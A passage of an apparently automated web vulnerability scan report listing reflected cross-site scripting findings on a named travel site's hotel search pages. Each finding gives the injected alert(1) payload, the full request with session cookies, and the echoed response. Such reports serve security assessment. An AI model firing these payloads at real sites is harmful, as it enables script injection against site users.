The value of the checkOutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ace3"style%3d"x%3aexpression(alert(1))"bb7ca47d1b04f0ca3 was submitted in the checkOutDate parameter. This input was echoed as 5ace3"style="x:expression(alert(1))"bb7ca47d1b04f0ca3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F20115ace3"style%3d"x%3aexpression(alert(1))"bb7ca47d1b04f0ca3&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:29 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8895D726B371B688DA9245EF0D3D4980; Path=/hotel
Vary: Accept-Encoding
Content-Length: 40767
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<INPUT onkeydown="keyOutOfCalTextBox(event);" onfocus="focusCalTextBox(event, this);" maxLength="15" id="checkOutDate" name="checkOutDate" size="12" value="10/16/20115ace3"style="x:expression(alert(1))"bb7ca47d1b04f0ca3" onchange="fmtCalBoxDate(this, '%m/%d/%Y');">
...[SNIP]...
4.107. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the checkOutDate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3755"%3balert(1)//8a13c8bc9178965e7 was submitted in the checkOutDate parameter. This input was echoed as d3755";alert(1)//8a13c8bc9178965e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011d3755"%3balert(1)//8a13c8bc9178965e7&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:39 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 492600


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
2c["productID"] = "5";
c2c["wtPageTitle"] = "/hotel/hotelResultsListView_Change";
c2c["pricePoint"] = "1414";
c2c["numRooms"] = "1";
c2c["initialHotelCount"] = "137";
c2c["travelEndDate"] = "10/16/2011d3755";alert(1)//8a13c8bc9178965e7";
c2c["travelStartDate"] = "10/09/2011";
c2c["vid"] = "v2011100300373188ec0127";


function c2cUpdateData(strKey, strValue){
   c2c[strKey] = strValue;
}

ATGSvcs.setUOID(200106297609);
</script>
...[SNIP]...
4.108. http://travela.priceline.com/hotel/newHotelSearch.do [noWait parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the noWait request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d1ec"style%3d"x%3aexpression(alert(1))"0da24a740086c341c was submitted in the noWait parameter. This input was echoed as 4d1ec"style="x:expression(alert(1))"0da24a740086c341c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y4d1ec"style%3d"x%3aexpression(alert(1))"0da24a740086c341c&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:11:33 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=3D81B065BE9C8AA1609124869823ADD2; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8647
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="noWait" value="Y4d1ec"style="x:expression(alert(1))"0da24a740086c341c"/>
...[SNIP]...
4.109. http://travela.priceline.com/hotel/searchHotels.do [CkInDay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkInDay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c06ed"style%3d"x%3aexpression(alert(1))"68ae18697a7bf990f was submitted in the CkInDay parameter. This input was echoed as c06ed"style="x:expression(alert(1))"68ae18697a7bf990f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04c06ed"style%3d"x%3aexpression(alert(1))"68ae18697a7bf990f&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:44 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a201110030013449b6011592431; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A13%3A44&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:13:44 GMT; Path=/
Set-Cookie: JSESSIONID=F3628F017C20466C613C8A3EA2EFAF49; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8925
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkInDay" value="04c06ed"style="x:expression(alert(1))"68ae18697a7bf990f"/>
...[SNIP]...
4.110. http://travela.priceline.com/hotel/searchHotels.do [CkInMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkInMonth request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1694"style%3d"x%3aexpression(alert(1))"40f4443c19bf67c12 was submitted in the CkInMonth parameter. This input was echoed as a1694"style="x:expression(alert(1))"40f4443c19bf67c12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10a1694"style%3d"x%3aexpression(alert(1))"40f4443c19bf67c12&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:25 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a201110030013259a3011596815; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A13%3A25&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:13:25 GMT; Path=/
Set-Cookie: JSESSIONID=B10302AAA0649030C8524B189AF10516; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8919
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkInMonth" value="10a1694"style="x:expression(alert(1))"40f4443c19bf67c12"/>
...[SNIP]...
4.111. http://travela.priceline.com/hotel/searchHotels.do [CkInYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkInYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55907"style%3d"x%3aexpression(alert(1))"7f8076d466081c5c7 was submitted in the CkInYear parameter. This input was echoed as 55907"style="x:expression(alert(1))"7f8076d466081c5c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=201155907"style%3d"x%3aexpression(alert(1))"7f8076d466081c5c7&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:58 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5564010a20111003001358918011562544; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A13%3A58&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:13:58 GMT; Path=/
Set-Cookie: JSESSIONID=8D8F1AFF2B2AAE8852E4E7D598B4408A; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8941
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkInYear" value="201155907"style="x:expression(alert(1))"7f8076d466081c5c7"/>
...[SNIP]...
4.112. http://travela.priceline.com/hotel/searchHotels.do [CkOutDay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkOutDay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8ac"style%3d"x%3aexpression(alert(1))"feb4acd87dd36f29b was submitted in the CkOutDay parameter. This input was echoed as cd8ac"style="x:expression(alert(1))"feb4acd87dd36f29b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07cd8ac"style%3d"x%3aexpression(alert(1))"feb4acd87dd36f29b&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5463010a20111003001441a2c011748102; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A14%3A41&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:14:41 GMT; Path=/
Set-Cookie: JSESSIONID=57CF35F22DAC84A831E4110AC3384F82; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8944
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkOutDay" value="07cd8ac"style="x:expression(alert(1))"feb4acd87dd36f29b"/>
...[SNIP]...
4.113. http://travela.priceline.com/hotel/searchHotels.do [CkOutMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkOutMonth request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f9d7"style%3d"x%3aexpression(alert(1))"7ebc51a19c27b1e81 was submitted in the CkOutMonth parameter. This input was echoed as 1f9d7"style="x:expression(alert(1))"7ebc51a19c27b1e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=101f9d7"style%3d"x%3aexpression(alert(1))"7ebc51a19c27b1e81&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
